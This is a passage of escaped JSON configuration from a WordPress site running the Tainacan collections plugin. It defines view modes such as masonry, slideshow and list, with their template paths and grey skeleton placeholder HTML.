height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"width: 70%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003C/li\u003E\u003Cli style=\"break-inside: avoid; width: calc(100% - 40px); height: auto; background-color: var(--tainacan-block-gray1, #f2f2f2); margin: 0 0 15px 0; padding: 20px;\"\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 100%; height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 0 0 8px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 42px; height: 54px; background-color: var(--tainacan-block-gray2, #dbdbdb);float: right;margin-left: 10px;margin-bottom: 10px;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 60%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 50%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 65%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"width: 67%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"width: 89%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003C/li\u003E\u003Cli style=\"break-inside: avoid; width: calc(100% - 40px); height: auto; background-color: var(--tainacan-block-gray1, #f2f2f2); margin: 0 0 15px 0; padding: 20px;\"\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 100%; height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 0 0 8px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 42px; height: 54px; background-color: var(--tainacan-block-gray2, #dbdbdb);float: right;margin-left: 10px;margin-bottom: 10px;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 60%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 50%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 65%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"width: 74%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"width: 92%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"width: 74%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"width: 86%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003C/li\u003E\u003Cli style=\"break-inside: avoid; width: calc(100% - 40px); height: auto; background-color: var(--tainacan-block-gray1, #f2f2f2); margin: 0 0 15px 0; padding: 20px;\"\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 100%; height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 0 0 8px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 42px; height: 54px; background-color: var(--tainacan-block-gray2, #dbdbdb);float: right;margin-left: 10px;margin-bottom: 10px;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 60%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 50%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 65%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"width: 65%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"width: 98%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"width: 85%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003C/li\u003E\u003C/ul\u003E","requires_thumbnail":false},"masonry":{"label":"Mosaico","description":"A masonry view, similar to pinterest, which will display images without cropping.","type":"component","template":"/home/u694151090/domains/capazmente.com/public_html/wp-content/themes/tainacan-interface/tainacan/view-mode-masonry.php","component":"view-mode-masonry","thumbnail":"","icon":"\u003Cspan class=\"icon\"\u003E\u003Ci class=\"tainacan-icon tainacan-icon-viewmasonry tainacan-icon-1-25em\"\u003E\u003C/i\u003E\u003C/span\u003E","show_pagination":true,"full_screen":false,"dynamic_metadata":false,"implements_skeleton":true,"skeleton_template":"","placeholder_template":"\u003Cul style=\"list-style: none;width: 100%; height: auto; column-width: 120px; gap: 15px;padding: 0;\"\u003E\u003Cli style=\"break-inside: avoid; width: calc(100% - 20px); height: auto; background-color: var(--tainacan-block-gray1, #f2f2f2); margin: 0 0 15px 0; padding: 10px;\"\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%;height: 89px; background-color: var(--tainacan-block-gray2, #dbdbdb);margin-bottom: 10px;\"\u003E\u003C/div\u003E\t\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%;height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"break-inside: avoid; width: calc(100% - 20px); height: auto; background-color: var(--tainacan-block-gray1, #f2f2f2); margin: 0 0 15px 0; padding: 10px;\"\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%;height: 60px; background-color: var(--tainacan-block-gray2, #dbdbdb);margin-bottom: 10px;\"\u003E\u003C/div\u003E\t\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%;height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"break-inside: avoid; width: calc(100% - 20px); height: auto; background-color: var(--tainacan-block-gray1, #f2f2f2); margin: 0 0 15px 0; padding: 10px;\"\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%;height: 92px; background-color: var(--tainacan-block-gray2, #dbdbdb);margin-bottom: 10px;\"\u003E\u003C/div\u003E\t\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%;height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"break-inside: avoid; width: calc(100% - 20px); height: auto; background-color: var(--tainacan-block-gray1, #f2f2f2); margin: 0 0 15px 0; padding: 10px;\"\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%;height: 81px; background-color: var(--tainacan-block-gray2, #dbdbdb);margin-bottom: 10px;\"\u003E\u003C/div\u003E\t\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%;height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"break-inside: avoid; width: calc(100% - 20px); height: auto; background-color: var(--tainacan-block-gray1, #f2f2f2); margin: 0 0 15px 0; padding: 10px;\"\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%;height: 94px; background-color: var(--tainacan-block-gray2, #dbdbdb);margin-bottom: 10px;\"\u003E\u003C/div\u003E\t\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%;height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"break-inside: avoid; width: calc(100% - 20px); height: auto; background-color: var(--tainacan-block-gray1, #f2f2f2); margin: 0 0 15px 0; padding: 10px;\"\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%;height: 74px; background-color: var(--tainacan-block-gray2, #dbdbdb);margin-bottom: 10px;\"\u003E\u003C/div\u003E\t\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%;height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"break-inside: avoid; width: calc(100% - 20px); height: auto; background-color: var(--tainacan-block-gray1, #f2f2f2); margin: 0 0 15px 0; padding: 10px;\"\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%;height: 89px; background-color: var(--tainacan-block-gray2, #dbdbdb);margin-bottom: 10px;\"\u003E\u003C/div\u003E\t\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%;height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"break-inside: avoid; width: calc(100% - 20px); height: auto; background-color: var(--tainacan-block-gray1, #f2f2f2); margin: 0 0 15px 0; padding: 10px;\"\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%;height: 97px; background-color: var(--tainacan-block-gray2, #dbdbdb);margin-bottom: 10px;\"\u003E\u003C/div\u003E\t\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%;height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"break-inside: avoid; width: calc(100% - 20px); height: auto; background-color: var(--tainacan-block-gray1, #f2f2f2); margin: 0 0 15px 0; padding: 10px;\"\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%;height: 111px; background-color: var(--tainacan-block-gray2, #dbdbdb);margin-bottom: 10px;\"\u003E\u003C/div\u003E\t\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%;height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"break-inside: avoid; width: calc(100% - 20px); height: auto; background-color: var(--tainacan-block-gray1, #f2f2f2); margin: 0 0 15px 0; padding: 10px;\"\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%;height: 92px; background-color: var(--tainacan-block-gray2, #dbdbdb);margin-bottom: 10px;\"\u003E\u003C/div\u003E\t\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%;height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"break-inside: avoid; width: calc(100% - 20px); height: auto; background-color: var(--tainacan-block-gray1, #f2f2f2); margin: 0 0 15px 0; padding: 10px;\"\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%;height: 108px; background-color: var(--tainacan-block-gray2, #dbdbdb);margin-bottom: 10px;\"\u003E\u003C/div\u003E\t\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%;height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"break-inside: avoid; width: calc(100% - 20px); height: auto; background-color: var(--tainacan-block-gray1, #f2f2f2); margin: 0 0 15px 0; padding: 10px;\"\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%;height: 90px; background-color: var(--tainacan-block-gray2, #dbdbdb);margin-bottom: 10px;\"\u003E\u003C/div\u003E\t\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%;height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003C/li\u003E\u003C/ul\u003E","requires_thumbnail":true},"slideshow":{"label":"Diapositivas","description":"A fullscreen slideshow view, that shows the item document instead of just thumbnails.","type":"component","template":"/home/u694151090/domains/capazmente.com/public_html/wp-content/themes/tainacan-interface/tainacan/view-mode-slideshow.php","component":"view-mode-slideshow","thumbnail":"","icon":"\u003Cspan class=\"icon\"\u003E\u003Ci class=\"tainacan-icon tainacan-icon-viewgallery tainacan-icon-1-25em\"\u003E\u003C/i\u003E\u003C/span\u003E","show_pagination":false,"full_screen":true,"dynamic_metadata":false,"implements_skeleton":false,"skeleton_template":"","placeholder_template":"\u003Cdiv style=\"background-color: var(--tainacan-block-gray0, #f0f0f0);display: flex; flex-direction: column; gap: 4px; padding: 4px\"\u003E\n\t\t\t\t\t\u003Cdiv style=\"display: flex; align-items: center;flex-direction: column; height: calc(100% - 90px); justify-content: center; gap: 12px;padding: 4px;\"\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 800px;max-width: 90%; height: 400px; background-color: var(--tainacan-block-gray2, #dbdbdb);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 300px;max-width: 90%; height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 10px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003C/div\u003E\n\t\t\t\t\t\u003Cul style=\"list-style: none;width: 100%; height: 86px;display: flex;flex-direction:row;gap: 4px;margin:0px;padding: 4px;overflow-x: auto;\"\u003E\u003Cli style=\"width: 76px; height: 76px; flex-shrink: 0; background-color: var(--tainacan-block-gray2, #dbdbdb;\"\u003E\n\t\t\t\t\t\t\t\t\u003Cdiv style=\"width: 70px;height:70px; background-color: var(--tainacan-block-gray2, #dbdbdb);margin-bottom: 10px;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"width: 76px; height: 76px; flex-shrink: 0; background-color: var(--tainacan-block-gray2, #dbdbdb;\"\u003E\n\t\t\t\t\t\t\t\t\u003Cdiv style=\"width: 70px;height:70px; background-color: var(--tainacan-block-gray2, #dbdbdb);margin-bottom: 10px;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"width: 76px; height: 76px; flex-shrink: 0; background-color: var(--tainacan-block-gray2, #dbdbdb;\"\u003E\n\t\t\t\t\t\t\t\t\u003Cdiv style=\"width: 70px;height:70px; background-color: var(--tainacan-block-gray2, #dbdbdb);margin-bottom: 10px;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"width: 76px; height: 76px; flex-shrink: 0; background-color: var(--tainacan-block-gray2, #dbdbdb;\"\u003E\n\t\t\t\t\t\t\t\t\u003Cdiv style=\"width: 70px;height:70px; background-color: var(--tainacan-block-gray2, #dbdbdb);margin-bottom: 10px;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"width: 76px; height: 76px; flex-shrink: 0; background-color: var(--tainacan-block-gray2, #dbdbdb;\"\u003E\n\t\t\t\t\t\t\t\t\u003Cdiv style=\"width: 70px;height:70px; background-color: var(--tainacan-block-gray2, #dbdbdb);margin-bottom: 10px;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"width: 76px; height: 76px; flex-shrink: 0; background-color: var(--tainacan-block-gray2, #dbdbdb;\"\u003E\n\t\t\t\t\t\t\t\t\u003Cdiv style=\"width: 70px;height:70px; background-color: var(--tainacan-block-gray2, #dbdbdb);margin-bottom: 10px;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"width: 76px; height: 76px; flex-shrink: 0; background-color: var(--tainacan-block-gray2, #dbdbdb;\"\u003E\n\t\t\t\t\t\t\t\t\u003Cdiv style=\"width: 70px;height:70px; background-color: var(--tainacan-block-gray2, #dbdbdb);margin-bottom: 10px;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"width: 76px; height: 76px; flex-shrink: 0; background-color: var(--tainacan-block-gray2, #dbdbdb;\"\u003E\n\t\t\t\t\t\t\t\t\u003Cdiv style=\"width: 70px;height:70px; background-color: var(--tainacan-block-gray2, #dbdbdb);margin-bottom: 10px;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"width: 76px; height: 76px; flex-shrink: 0; background-color: var(--tainacan-block-gray2, #dbdbdb;\"\u003E\n\t\t\t\t\t\t\t\t\u003Cdiv style=\"width: 70px;height:70px; background-color: var(--tainacan-block-gray2, #dbdbdb);margin-bottom: 10px;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"width: 76px; height: 76px; flex-shrink: 0; background-color: var(--tainacan-block-gray2, #dbdbdb;\"\u003E\n\t\t\t\t\t\t\t\t\u003Cdiv style=\"width: 70px;height:70px; background-color: var(--tainacan-block-gray2, #dbdbdb);margin-bottom: 10px;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"width: 76px; height: 76px; flex-shrink: 0; background-color: var(--tainacan-block-gray2, #dbdbdb;\"\u003E\n\t\t\t\t\t\t\t\t\u003Cdiv style=\"width: 70px;height:70px; background-color: var(--tainacan-block-gray2, #dbdbdb);margin-bottom: 10px;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"width: 76px; height: 76px; flex-shrink: 0; background-color: var(--tainacan-block-gray2, #dbdbdb;\"\u003E\n\t\t\t\t\t\t\t\t\u003Cdiv style=\"width: 70px;height:70px; background-color: var(--tainacan-block-gray2, #dbdbdb);margin-bottom: 10px;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"width: 76px; height: 76px; flex-shrink: 0; background-color: var(--tainacan-block-gray2, #dbdbdb;\"\u003E\n\t\t\t\t\t\t\t\t\u003Cdiv style=\"width: 70px;height:70px; background-color: var(--tainacan-block-gray2, #dbdbdb);margin-bottom: 10px;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"width: 76px; height: 76px; flex-shrink: 0; background-color: var(--tainacan-block-gray2, #dbdbdb;\"\u003E\n\t\t\t\t\t\t\t\t\u003Cdiv style=\"width: 70px;height:70px; background-color: var(--tainacan-block-gray2, #dbdbdb);margin-bottom: 10px;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"width: 76px; height: 76px; flex-shrink: 0; background-color: var(--tainacan-block-gray2, #dbdbdb;\"\u003E\n\t\t\t\t\t\t\t\t\u003Cdiv style=\"width: 70px;height:70px; background-color: var(--tainacan-block-gray2, #dbdbdb);margin-bottom: 10px;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"width: 76px; height: 76px; flex-shrink: 0; background-color: var(--tainacan-block-gray2, #dbdbdb;\"\u003E\n\t\t\t\t\t\t\t\t\u003Cdiv style=\"width: 70px;height:70px; background-color: var(--tainacan-block-gray2, #dbdbdb);margin-bottom: 10px;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"width: 76px; height: 76px; flex-shrink: 0; background-color: var(--tainacan-block-gray2, #dbdbdb;\"\u003E\n\t\t\t\t\t\t\t\t\u003Cdiv style=\"width: 70px;height:70px; background-color: var(--tainacan-block-gray2, #dbdbdb);margin-bottom: 10px;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"width: 76px; height: 76px; flex-shrink: 0; background-color: var(--tainacan-block-gray2, #dbdbdb;\"\u003E\n\t\t\t\t\t\t\t\t\u003Cdiv style=\"width: 70px;height:70px; background-color: var(--tainacan-block-gray2, #dbdbdb);margin-bottom: 10px;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\t\u003C/li\u003E\u003C/ul\u003E\n\t\t\t\t\u003C/div\u003E","requires_thumbnail":true},"list":{"label":"Lista","description":"A list view, similiar to the records, but full width.","type":"component","template":"/home/u694151090/domains/capazmente.com/public_html/wp-content/themes/tainacan-interface/tainacan/view-mode-list.php","component":"view-mode-list","thumbnail":"","icon":"\u003Cspan class=\"icon\"\u003E\u003Ci class=\"tainacan-icon tainacan-icon-viewlist tainacan-icon-1-25em\"\u003E\u003C/i\u003E\u003C/span\u003E","show_pagination":true,"full_screen":false,"dynamic_metadata":true,"implements_skeleton":true,"skeleton_template":"","placeholder_template":"\u003Cul style=\"list-style: none;width: 100%; height: auto; display: flex;flex-direction:column; gap: 15px;padding: 0;\"\u003E\u003Cli style=\"height: auto; background-color: var(--tainacan-block-gray1, #f2f2f2);padding: 20px;\"\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%; height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 0 0 8px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 64px; height:74px; background-color: var(--tainacan-block-gray2, #dbdbdb);float:left;margin-right:10px;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"margin-left: 74px; column-width: 200px;\"\u003E\u003Cdiv style=\"break-inside: avoid;width: 98%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"break-inside: avoid;width: 91%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"break-inside: avoid;width: 53%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"break-inside: avoid;width: 100%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"break-inside: avoid;width: 77%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"break-inside: avoid;width: 55%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003C/div\u003E\t\n\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"height: auto; background-color: var(--tainacan-block-gray1, #f2f2f2);padding: 20px;\"\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%; height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 0 0 8px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 64px; height:83px; background-color: var(--tainacan-block-gray2, #dbdbdb);float:left;margin-right:10px;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"margin-left: 74px; column-width: 200px;\"\u003E\u003Cdiv style=\"break-inside: avoid;width: 97%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"break-inside: avoid;width: 45%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"break-inside: avoid;width: 49%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"break-inside: avoid;width: 88%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"break-inside: avoid;width: 84%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003C/div\u003E\t\n\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"height: auto; background-color: var(--tainacan-block-gray1, #f2f2f2);padding: 20px;\"\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%; height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 0 0 8px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 64px; height:60px; background-color: var(--tainacan-block-gray2, #dbdbdb);float:left;margin-right:10px;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"margin-left: 74px; column-width: 200px;\"\u003E\u003Cdiv style=\"break-inside: avoid;width: 69%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"break-inside: avoid;width: 54%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"break-inside: avoid;width: 60%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"break-inside: avoid;width: 82%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"break-inside: avoid;width: 98%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"break-inside: avoid;width: 61%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003C/div\u003E\t\n\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"height: auto; background-color: var(--tainacan-block-gray1, #f2f2f2);padding: 20px;\"\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%; height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 0 0 8px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 64px; height:96px; background-color: var(--tainacan-block-gray2, #dbdbdb);float:left;margin-right:10px;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"margin-left: 74px; column-width: 200px;\"\u003E\u003Cdiv style=\"break-inside: avoid;width: 100%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"break-inside: avoid;width: 49%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"break-inside: avoid;width: 51%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"break-inside: avoid;width: 85%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"break-inside: avoid;width: 61%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"break-inside: avoid;width: 97%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"break-inside: avoid;width: 81%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003C/div\u003E\t\n\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"height: auto; background-color: var(--tainacan-block-gray1, #f2f2f2);padding: 20px;\"\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%; height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 0 0 8px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 64px; height:100px; background-color: var(--tainacan-block-gray2, #dbdbdb);float:left;margin-right:10px;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"margin-left: 74px; column-width: 200px;\"\u003E\u003Cdiv style=\"break-inside: avoid;width: 67%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"break-inside: avoid;width: 51%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"break-inside: avoid;width: 51%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"break-inside: avoid;width: 49%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"break-inside: avoid;width: 70%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"break-inside: avoid;width: 64%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003C/div\u003E\t\n\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"height: auto; background-color: var(--tainacan-block-gray1, #f2f2f2);padding: 20px;\"\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%; height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 0 0 8px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 64px; height:66px; background-color: var(--tainacan-block-gray2, 